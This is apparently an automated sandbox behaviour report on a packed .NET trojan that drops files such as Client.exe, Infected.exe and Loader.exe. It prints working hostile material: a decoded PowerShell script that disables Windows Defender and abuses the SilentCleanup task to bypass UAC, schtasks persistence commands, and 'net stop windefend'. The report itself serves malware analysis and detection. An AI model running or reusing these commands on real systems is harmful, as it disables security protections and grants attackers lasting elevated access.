Source: Amcache.hve.30.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.30.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.30.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.30.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\Client.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Client.exe.0.dr, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: Client.exe.0.dr, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: Client.exe.0.dr, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

